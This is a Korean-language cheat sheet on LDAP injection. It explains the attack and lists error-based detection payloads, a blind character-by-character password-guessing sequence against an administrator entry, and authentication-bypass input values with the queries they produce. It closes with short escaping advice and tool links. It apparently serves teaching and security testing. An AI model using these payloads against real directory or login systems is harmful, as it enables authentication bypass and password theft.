Introduction
LDAP Injeciton은 LDAP(Lightweight Directory Access Protocol)에 대한 Injection 공격으로 사용자의 입력값이 LDAP Query에 직접 영향을 끼칠 수 있을 때 이를 통해 비정상적인 LDAP 동작을 유도하는 공격 방법입니다. 보통의 Injection 취약점과 비슷하게 전반적인 공격 매커니즘은 SQL Injection 등 대다수 Injection 방식과 동일합니다.
LDAP이란?
LDAP 자체는 TCP/IP 위에서 DS(Directory Service)를 조회하고 수정하는 Application Protocol 이지만, 보통은 기업 인프라에서 사람, 기기 등의 인증에서 사용되는 경우가 많습니다. 그래서 LDAP Injection의 대표적인 리스크가 인증 우회입니다.
Offensive techniques
Detect
Error base
Response 내 노출되는 에러를 통해 LDAP 구문의 일부가 노출되는 경우 LDAP Injection에 취약할 가능성이 높습니다. 공격자는 이 정보를 기반으로 LDAP Query를 유추하여 의도되지 않은 액션을 수행하도록 유도할 수 있습니다.
*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
Blind
(&(sn=administrator)(password=*)) : OK
(&(sn=administrator)(password=A*)) : KO
(&(sn=administrator)(password=B*)) : KO
...
(&(sn=administrator)(password=M*)) : OK
(&(sn=administrator)(password=MA*)) : KO
(&(sn=administrator)(password=MB*)) : KO
...
(&(sn=administrator)(password=MY*)) : OK
(&(sn=administrator)(password=MYA*)) : KO
(&(sn=administrator)(password=MYB*)) : KO
(&(sn=administrator)(password=MYC*)) : KO
...
(&(sn=administrator)(password=MYK*)) : OK
(&(sn=administrator)(password=MYKE)) : OK
Exploitation
user = *)(uid=*))(|(uid=*
pass = password
query = "(&(uid=*)(uid=*)) (|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))"
user = admin)(!(&(1=0
pass = q))
query = (&(uid=admin)(!(&(1=0)(userPassword=q))))
Attribute List
userPassword
surname
name
cn
sn
objectClass
mail
givenName
commonName
Defensive techniques
특수문자 Escape
아래 특수문자에 대해서 Escape 처리가 필요합니다.
* ( ) . & - _ [ ] backktick(`) ~ ` |
` @ $ % ^ ? : { } ! ' |
그리고 가능하다면 framework, library 등에서 제공하는 보안기능을 이용해 막는 것이 좋습니다.
Tools
- OWASP ZAP (https://www.zaproxy.org/docs/alerts/40015/)
- BurpSuite (https://portswigger.net/kb/issues/00100500_ldap-injection)
- Scripts (Python, Ruby)